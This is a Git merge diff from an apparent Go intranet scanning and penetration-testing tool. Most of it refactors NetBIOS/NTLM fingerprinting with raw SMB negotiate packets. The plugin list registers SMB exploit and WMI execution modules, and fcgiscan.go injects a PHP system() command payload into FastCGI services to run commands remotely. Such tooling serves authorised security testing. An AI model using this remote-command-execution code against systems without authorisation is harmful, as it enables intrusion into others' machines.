Merge remote-tracking branch 'origin/main'

# Conflicts: # Plugins/webtitle.go # WebScan/WebScan.go # WebScan/pocs/Hotel-Internet-Manage-RCE.yml
加入hash碰撞、wmiiexec无回显命令执行
2026-02-15 05:09:17 +08:00 · 2022-11-19 17:05:25 +08:00 · 2022-11-19 17:04:13 +08:00 · 2022-11-02 17:41:06 +08:00 · 2022-11-02 17:29:12 +08:00 · 2022-09-02 11:38:41 +08:00
70 changed files with 3394 additions and 955 deletions
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -103,7 +103,7 @@ func SmbGhost(info *common.HostInfo) error {
 }

 func SmbGhostScan(info *common.HostInfo) error {
-	ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
+	ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
 	addr := fmt.Sprintf("%s:%v", info.Host, port)
 	conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
 	defer func() {
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -2,89 +2,54 @@ package Plugins

 import (
 	"bytes"
+	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
+	"gopkg.in/yaml.v3"
 	"net"
 	"strconv"
 	"strings"
 	"time"
 )

-var (
-	UNIQUE_NAMES = map[string]string{
-		"\x00": "Workstation Service",
-		"\x03": "Messenger Service",
-		"\x06": "RAS Server Service",
-		"\x1F": "NetDDE Service",
-		"\x20": "Server Service",
-		"\x21": "RAS Client Service",
-		"\xBE": "Network Monitor Agent",
-		"\xBF": "Network Monitor Application",
-		"\x1D": "Master Browser",
-		"\x1B": "Domain Master Browser",
-	}
-
-	GROUP_NAMES = map[string]string{
-		"\x00": "Domain Name",
-		"\x1C": "Domain Controllers",
-		"\x1E": "Browser Service Elections",
-	}
-
-	NetBIOS_ITEM_TYPE = map[string]string{
-		"\x01\x00": "NetBIOS computer name",
-		"\x02\x00": "NetBIOS domain name",
-		"\x03\x00": "DNS computer name",
-		"\x04\x00": "DNS domain name",
-		"\x05\x00": "DNS tree name",
-		"\x07\x00": "Time stamp",
-	}
-)
-
-type NbnsName struct {
-	unique    string
-	group     string
-	msg       string
-	osversion string
-}
+var netbioserr = errors.New("netbios error")

 func NetBIOS(info *common.HostInfo) error {
-	nbname, err := NetBIOS1(info)
-	var msg, isdc string
-
-	if strings.Contains(nbname.msg, "Domain Controllers") {
-		isdc = "[+]DC"
+	netbios, _ := NetBIOS1(info)
+	output := netbios.String()
+	if len(output) > 0 {
+		result := fmt.Sprintf("[*] NetBios: %-15s %s ", info.Host, output)
+		common.LogSuccess(result)
+		return nil
 	}
-	msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s   %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
-
-	if info.Scantype == "netbios" {
-		msg += "\n-------------------------------------------\n" + nbname.msg
-	}
-	if len(nbname.group) > 0 || len(nbname.unique) > 0 {
-		common.LogSuccess(msg)
-	}
-	return err
+	return netbioserr
 }

-func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
-	nbname, err = GetNbnsname(info)
+func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) {
+	netbios, err = GetNbnsname(info)
 	var payload0 []byte
-	if err == nil {
-		name := netbiosEncode(nbname.unique)
+	if netbios.ServerService != "" || netbios.WorkstationService != "" {
+		ss := netbios.ServerService
+		if ss == "" {
+			ss = netbios.WorkstationService
+		}
+		name := netbiosEncode(ss)
 		payload0 = append(payload0, []byte("\x81\x00\x00D ")...)
 		payload0 = append(payload0, name...)
 		payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
 	}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
-	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	var conn net.Conn
+	conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
-		if conn != nil{
+		if conn != nil {
 			conn.Close()
 		}
 	}()
 	if err != nil {
 		return
 	}
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return
 	}
@@ -94,116 +59,49 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 		if err1 != nil {
 			return
 		}
-		_, err1 = readbytes(conn)
+		_, err1 = ReadBytes(conn)
 		if err1 != nil {
 			return
 		}
 	}

-	payload1 := []byte("\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00")
-	payload2 := []byte("\x00\x00\x01\x0a\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x0c\xff\x00\x0a\x01\x04\x41\x32\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xcf\x00\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\xce\x0e\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x33\x00\x37\x00\x39\x00\x30\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x32\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x35\x00\x2e\x00\x32\x00\x00\x00\x00\x00")
-	_, err = conn.Write(payload1)
+	_, err = conn.Write(NegotiateSMBv1Data1)
 	if err != nil {
 		return
 	}
-	_, err = readbytes(conn)
+	_, err = ReadBytes(conn)
 	if err != nil {
 		return
 	}

-	_, err = conn.Write(payload2)
+	_, err = conn.Write(NegotiateSMBv1Data2)
 	if err != nil {
 		return
 	}
-	ret, err := readbytes(conn)
-	if err != nil || len(ret) < 45 {
-		return
-	}
-
-	num1, err := bytetoint(ret[43:44][0])
+	var ret []byte
+	ret, err = ReadBytes(conn)
 	if err != nil {
 		return
 	}
-	num2, err := bytetoint(ret[44:45][0])
-	if err != nil {
-		return
-	}
-	length := num1 + num2*256
-	if len(ret) < 48+length {
-		return
-	}
-	os_version := ret[47+length:]
-	tmp1 := bytes.ReplaceAll(os_version, []byte{0x00, 0x00}, []byte{124})
-	tmp1 = bytes.ReplaceAll(tmp1, []byte{0x00}, []byte{})
-	msg1 := string(tmp1[:len(tmp1)-1])
-	nbname.osversion = msg1
-	index1 := strings.Index(msg1, "|")
-	if index1 > 0 {
-		nbname.osversion = nbname.osversion[:index1]
-	}
-	nbname.msg += "-------------------------------------------\n"
-	nbname.msg += msg1 + "\n"
-	start := bytes.Index(ret, []byte("NTLMSSP"))
-	if len(ret) < start+45 {
-		return
-	}
-	num1, err = bytetoint(ret[start+40 : start+41][0])
-	if err != nil {
-		return
-	}
-	num2, err = bytetoint(ret[start+41 : start+42][0])
-	if err != nil {
-		return
-	}
-	length = num1 + num2*256
-	num1, err = bytetoint(ret[start+44 : start+45][0])
-	if err != nil {
-		return
-	}
-	offset, err := bytetoint(ret[start+44 : start+45][0])
-	if err != nil || len(ret) < start+offset+length {
-		return
-	}
-	index := start + offset
-	for index < start+offset+length {
-		item_type := ret[index : index+2]
-		num1, err = bytetoint(ret[index+2 : index+3][0])
-		if err != nil {
-			return
-		}
-		num2, err = bytetoint(ret[index+3 : index+4][0])
-		if err != nil {
-			return
-		}
-		item_length := num1 + num2*256
-		item_content := bytes.ReplaceAll(ret[index+4:index+4+item_length], []byte{0x00}, []byte{})
-		index += 4 + item_length
-		if string(item_type) == "\x07\x00" {
-			//Time stamp, 暂时不想处理
-		} else if NetBIOS_ITEM_TYPE[string(item_type)] != "" {
-			nbname.msg += fmt.Sprintf("%-22s: %s\n", NetBIOS_ITEM_TYPE[string(item_type)], string(item_content))
-		} else if string(item_type) == "\x00\x00" {
-			break
-		} else {
-			nbname.msg += fmt.Sprintf("Unknown: %s\n", string(item_content))
-		}
-	}
-	return nbname, err
+	netbios2, err := ParseNTLM(ret)
+	JoinNetBios(&netbios, &netbios2)
+	return
 }

-func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
+func GetNbnsname(info *common.HostInfo) (netbios NetBiosInfo, err error) {
 	senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
-	realhost := fmt.Sprintf("%s:%v", info.Host, 137)
-	conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
+	//senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01")
+	realhost := fmt.Sprintf("%s:137", info.Host)
+	conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
-		if conn != nil{
+		if conn != nil {
 			conn.Close()
 		}
 	}()
 	if err != nil {
 		return
 	}
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return
 	}
@@ -211,61 +109,11 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	if err != nil {
 		return
 	}
-	text, err := readbytes(conn)
-	if err != nil {
-		return
-	}
-	if len(text) < 57 {
-		return nbname, fmt.Errorf("no names available")
-	}
-	num, err := bytetoint(text[56:57][0])
-	if err != nil {
-		return
-	}
-	data := text[57:]
-	var msg string
-	for i := 0; i < num; i++ {
-		if len(data) < 18*i+16 {
-			break
-		}
-		name := string(data[18*i : 18*i+15])
-		flag_bit := data[18*i+15 : 18*i+16]
-		if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
-			msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
-		} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
-			msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
-		} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
-			name_flags := data[18*i+16 : 18*i+18][0]
-			if name_flags >= 128 {
-				nbname.group = strings.Replace(name, " ", "", -1)
-				msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
-			} else {
-				nbname.unique = strings.Replace(name, " ", "", -1)
-				msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
-			}
-		} else {
-			msg += fmt.Sprintf("%s \n", name)
-		}
-	}
-	nbname.msg += msg
+	text, _ := ReadBytes(conn)
+	netbios, err = ParseNetBios(text)
 	return
 }

-func readbytes(conn net.Conn) (result []byte, err error) {
-	buf := make([]byte, 4096)
-	for {
-		count, err := conn.Read(buf)
-		if err != nil {
-			break
-		}
-		result = append(result, buf[0:count]...)
-		if count < 4096 {
-			break
-		}
-	}
-	return result, err
-}
-
 func bytetoint(text byte) (int, error) {
 	num1 := fmt.Sprintf("%v", text)
 	num, err := strconv.Atoi(num1)
@@ -287,3 +135,241 @@ func netbiosEncode(name string) (output []byte) {
 	}
 	return
 }
+
+var (
+	UNIQUE_NAMES = map[string]string{
+		"\x00": "WorkstationService",
+		"\x03": "Messenger Service",
+		"\x06": "RAS Server Service",
+		"\x1F": "NetDDE Service",
+		"\x20": "ServerService",
+		"\x21": "RAS Client Service",
+		"\xBE": "Network Monitor Agent",
+		"\xBF": "Network Monitor Application",
+		"\x1D": "Master Browser",
+		"\x1B": "Domain Master Browser",
+	}
+
+	GROUP_NAMES = map[string]string{
+		"\x00": "DomainName",
+		"\x1C": "DomainControllers",
+		"\x1E": "Browser Service Elections",
+	}
+
+	NetBIOS_ITEM_TYPE = map[string]string{
+		"\x01\x00": "NetBiosComputerName",
+		"\x02\x00": "NetBiosDomainName",
+		"\x03\x00": "ComputerName",
+		"\x04\x00": "DomainName",
+		"\x05\x00": "DNS tree name",
+		"\x07\x00": "Time stamp",
+	}
+	NegotiateSMBv1Data1 = []byte{
+		0x00, 0x00, 0x00, 0x85, 0xFF, 0x53, 0x4D, 0x42, 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xC8,
+		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
+		0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4E, 0x45, 0x54, 0x57, 0x4F,
+		0x52, 0x4B, 0x20, 0x50, 0x52, 0x4F, 0x47, 0x52, 0x41, 0x4D, 0x20, 0x31, 0x2E, 0x30, 0x00, 0x02,
+		0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x31, 0x2E, 0x30, 0x00, 0x02, 0x57, 0x69, 0x6E, 0x64, 0x6F,
+		0x77, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x6F, 0x72, 0x6B, 0x67, 0x72, 0x6F, 0x75, 0x70,
+		0x73, 0x20, 0x33, 0x2E, 0x31, 0x61, 0x00, 0x02, 0x4C, 0x4D, 0x31, 0x2E, 0x32, 0x58, 0x30, 0x30,
+		0x32, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x32, 0x2E, 0x31, 0x00, 0x02, 0x4E, 0x54,
+		0x20, 0x4C, 0x4D, 0x20, 0x30, 0x2E, 0x31, 0x32, 0x00,
+	}
+	NegotiateSMBv1Data2 = []byte{
+		0x00, 0x00, 0x01, 0x0A, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
+		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
+		0x00, 0x00, 0x40, 0x00, 0x0C, 0xFF, 0x00, 0x0A, 0x01, 0x04, 0x41, 0x32, 0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0xA0, 0xCF, 0x00, 0x60,
+		0x48, 0x06, 0x06, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x02, 0xA0, 0x3E, 0x30, 0x3C, 0xA0, 0x0E, 0x30,
+		0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0A, 0xA2, 0x2A, 0x04,
+		0x28, 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x82, 0x08,
+		0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+		0x00, 0x05, 0x02, 0xCE, 0x0E, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00,
+		0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,
+		0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x33, 0x00,
+		0x20, 0x00, 0x33, 0x00, 0x37, 0x00, 0x39, 0x00, 0x30, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,
+		0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,
+		0x63, 0x00, 0x6B, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,
+		0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,
+		0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,
+		0x33, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2E, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00,
+	}
+)
+
+type NetBiosInfo struct {
+	GroupName          string
+	WorkstationService string `yaml:"WorkstationService"`
+	ServerService      string `yaml:"ServerService"`
+	DomainName         string `yaml:"DomainName"`
+	DomainControllers  string `yaml:"DomainControllers"`
+	ComputerName       string `yaml:"ComputerName"`
+	OsVersion          string `yaml:"OsVersion"`
+	NetDomainName      string `yaml:"NetBiosDomainName"`
+	NetComputerName    string `yaml:"NetBiosComputerName"`
+}
+
+func (info *NetBiosInfo) String() (output string) {
+	var text string
+	//ComputerName 信息比较全
+	if info.ComputerName != "" {
+		if !strings.Contains(info.ComputerName, ".") && info.GroupName != "" {
+			text = fmt.Sprintf("%s\\%s", info.GroupName, info.ComputerName)
+		} else {
+			text = info.ComputerName
+		}
+	} else {
+		//组信息
+		if info.DomainName != "" {
+			text += info.DomainName
+			text += "\\"
+		} else if info.NetDomainName != "" {
+			text += info.NetDomainName
+			text += "\\"
+		}
+		//机器名
+		if info.ServerService != "" {
+			text += info.ServerService
+		} else if info.WorkstationService != "" {
+			text += info.WorkstationService
+		} else if info.NetComputerName != "" {
+			text += info.NetComputerName
+		}
+	}
+	if text == "" {
+	} else if info.DomainControllers != "" {
+		output = fmt.Sprintf("[+]DC %-24s", text)
+	} else {
+		output = fmt.Sprintf("%-30s", text)
+	}
+	if info.OsVersion != "" {
+		output += "      " + info.OsVersion
+	}
+	return
+}
+
+func ParseNetBios(input []byte) (netbios NetBiosInfo, err error) {
+	if len(input) < 57 {
+		err = netbioserr
+		return
+	}
+	data := input[57:]
+	var num int
+	num, err = bytetoint(input[56:57][0])
+	if err != nil {
+		return
+	}
+	var msg string
+	for i := 0; i < num; i++ {
+		if len(data) < 18*i+16 {
+			break
+		}
+		name := string(data[18*i : 18*i+15])
+		flag_bit := data[18*i+15 : 18*i+16]
+		if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
+			msg += fmt.Sprintf("%s: %s\n", GROUP_NAMES[string(flag_bit)], name)
+		} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
+			msg += fmt.Sprintf("%s: %s\n", UNIQUE_NAMES[string(flag_bit)], name)
+		} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
+			name_flags := data[18*i+16 : 18*i+18][0]
+			if name_flags >= 128 {
+				msg += fmt.Sprintf("%s: %s\n", GROUP_NAMES[string(flag_bit)], name)
+			} else {
+				msg += fmt.Sprintf("%s: %s\n", UNIQUE_NAMES[string(flag_bit)], name)
+			}
+		} else {
+			msg += fmt.Sprintf("%s \n", name)
+		}
+	}
+	if len(msg) == 0 {
+		err = netbioserr
+		return
+	}
+	err = yaml.Unmarshal([]byte(msg), &netbios)
+	if netbios.DomainName != "" {
+		netbios.GroupName = netbios.DomainName
+	}
+	return
+}
+
+func ParseNTLM(ret []byte) (netbios NetBiosInfo, err error) {
+	if len(ret) < 47 {
+		err = netbioserr
+		return
+	}
+	var num1, num2 int
+	num1, err = bytetoint(ret[43:44][0])
+	if err != nil {
+		return
+	}
+	num2, err = bytetoint(ret[44:45][0])
+	if err != nil {
+		return
+	}
+	length := num1 + num2*256
+	if len(ret) < 48+length {
+		return
+	}
+	os_version := ret[47+length:]
+	tmp1 := bytes.ReplaceAll(os_version, []byte{0x00, 0x00}, []byte{124})
+	tmp1 = bytes.ReplaceAll(tmp1, []byte{0x00}, []byte{})
+	ostext := string(tmp1[:len(tmp1)-1])
+	ss := strings.Split(ostext, "|")
+	netbios.OsVersion = ss[0]
+	start := bytes.Index(ret, []byte("NTLMSSP"))
+	if len(ret) < start+45 {
+		return
+	}
+	num1, err = bytetoint(ret[start+40 : start+41][0])
+	if err != nil {
+		return
+	}
+	num2, err = bytetoint(ret[start+41 : start+42][0])
+	if err != nil {
+		return
+	}
+	length = num1 + num2*256
+	num1, err = bytetoint(ret[start+44 : start+45][0])
+	if err != nil {
+		return
+	}
+	offset, err := bytetoint(ret[start+44 : start+45][0])
+	if err != nil || len(ret) < start+offset+length {
+		return
+	}
+	var msg string
+	index := start + offset
+	for index < start+offset+length {
+		item_type := ret[index : index+2]
+		num1, err = bytetoint(ret[index+2 : index+3][0])
+		if err != nil {
+			continue
+		}
+		num2, err = bytetoint(ret[index+3 : index+4][0])
+		if err != nil {
+			continue
+		}
+		item_length := num1 + num2*256
+		item_content := bytes.ReplaceAll(ret[index+4:index+4+item_length], []byte{0x00}, []byte{})
+		index += 4 + item_length
+		if string(item_type) == "\x07\x00" {
+			//Time stamp, 不需要输出
+		} else if NetBIOS_ITEM_TYPE[string(item_type)] != "" {
+			msg += fmt.Sprintf("%s: %s\n", NetBIOS_ITEM_TYPE[string(item_type)], string(item_content))
+		} else if string(item_type) == "\x00\x00" {
+			break
+		}
+	}
+	err = yaml.Unmarshal([]byte(msg), &netbios)
+	return
+}
+
+func JoinNetBios(netbios1, netbios2 *NetBiosInfo) *NetBiosInfo {
+	netbios1.ComputerName = netbios2.ComputerName
+	netbios1.NetDomainName = netbios2.NetDomainName
+	netbios1.NetComputerName = netbios2.NetComputerName
+	if netbios2.DomainName != "" {
+		netbios1.DomainName = netbios2.DomainName
+	}
+	netbios1.OsVersion = netbios2.OsVersion
+	return netbios1
+}
--- a/Plugins/base.go
+++ b/Plugins/base.go
@@ -1,22 +1,44 @@
 package Plugins

+import "net"
+
 var PluginList = map[string]interface{}{
-	"21":       FtpScan,
-	"22":       SshScan,
-	"135":      Findnet,
-	"139":      NetBIOS,
-	"445":      SmbScan,
-	"1433":     MssqlScan,
-	"1521":     OracleScan,
-	"3306":     MysqlScan,
-	"3389":     RdpScan,
-	"5432":     PostgresScan,
-	"6379":     RedisScan,
-	"9000":     FcgiScan,
-	"11211":    MemcachedScan,
-	"27017":    MongodbScan,
-	"1000001":  MS17010,
-	"1000002":  SmbGhost,
-	"1000003":  WebTitle,
-	"10000031": WebTitle,
+	"21":      FtpScan,
+	"22":      SshScan,
+	"135":     Findnet,
+	"139":     NetBIOS,
+	"445":     SmbScan,
+	"1433":    MssqlScan,
+	"1521":    OracleScan,
+	"3306":    MysqlScan,
+	"3389":    RdpScan,
+	"5432":    PostgresScan,
+	"6379":    RedisScan,
+	"9000":    FcgiScan,
+	"11211":   MemcachedScan,
+	"27017":   MongodbScan,
+	"1000001": MS17010,
+	"1000002": SmbGhost,
+	"1000003": WebTitle,
+	"1000004": SmbScan2,
+	"1000005": WmiExec,
+}
+
+func ReadBytes(conn net.Conn) (result []byte, err error) {
+	size := 4096
+	buf := make([]byte, size)
+	for {
+		count, err := conn.Read(buf)
+		if err != nil {
+			break
+		}
+		result = append(result, buf[0:count]...)
+		if count < size {
+			break
+		}
+	}
+	if len(result) > 0 {
+		err = nil
+	}
+	return result, err
 }
--- a/Plugins/fcgiscan.go
+++ b/Plugins/fcgiscan.go
@@ -23,17 +23,17 @@ func FcgiScan(info *common.HostInfo) {
 		return
 	}
 	url := "/etc/issue"
-	if info.Path != "" {
-		url = info.Path
+	if common.Path != "" {
+		url = common.Path
 	}
 	addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
 	var reqParams string
 	var cutLine = "-----ASDGTasdkk361363s-----\n"
 	switch {
-	case info.Command == "read":
+	case common.Command == "read":
 		reqParams = ""
-	case info.Command != "":
-		reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
+	case common.Command != "":
+		reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
 	default:
 		reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
 	}
@@ -54,7 +54,7 @@ func FcgiScan(info *common.HostInfo) {
 		env["REQUEST_METHOD"] = "GET"
 	}

-	fcgi, err := New(addr, info.Timeout)
+	fcgi, err := New(addr, common.Timeout)
 	defer func() {
 		if fcgi.rwc != nil {
 			fcgi.rwc.Close()
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {

 func FindnetScan(info *common.HostInfo) error {
 	realhost := fmt.Sprintf("%s:%v", info.Host, 135)
-	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
 		if conn != nil {
 			conn.Close()
@@ -31,7 +31,7 @@ func FindnetScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return err
 	}
@@ -70,7 +70,7 @@ func read(text []byte, host string) error {
 	encodedStr := hex.EncodeToString(text)
 	hostnames := strings.Replace(encodedStr, "0700", "", -1)
 	hostname := strings.Split(hostnames, "000000")
-	result := "[+] NetInfo:\n[*]" + host
+	result := "[*] NetInfo:\n[*]" + host
 	for i := 0; i < len(hostname); i++ {
 		hostname[i] = strings.Replace(hostname[i], "00", "", -1)
 		host, err := hex.DecodeString(hostname[i])
--- a/Plugins/ftp.go
+++ b/Plugins/ftp.go
@@ -38,7 +38,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
 				if common.CheckErrs(err) {
 					return err
 				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
 					return err
 				}
 			}
@@ -50,7 +50,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
 func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
 	Host, Port, Username, Password := info.Host, info.Ports, user, pass
-	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
+	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
 	if err == nil {
 		err = conn.Login(Username, Password)
 		if err == nil {
--- a/Plugins/memcached.go
+++ b/Plugins/memcached.go
@@ -9,14 +9,14 @@ import (

 func MemcachedScan(info *common.HostInfo) (err error) {
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
-	client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
 	defer func() {
-		if client != nil{
+		if client != nil {
 			client.Close()
 		}
 	}()
 	if err == nil {
-		err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+		err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 		if err == nil {
 			_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
 			if err == nil {
--- a/Plugins/mongodb.go
+++ b/Plugins/mongodb.go
@@ -12,7 +12,6 @@ func MongodbScan(info *common.HostInfo) error {
 	if common.IsBrute {
 		return nil
 	}
-
 	_, err := MongodbUnauth(info)
 	if err != nil {
 		errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
@@ -25,7 +24,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
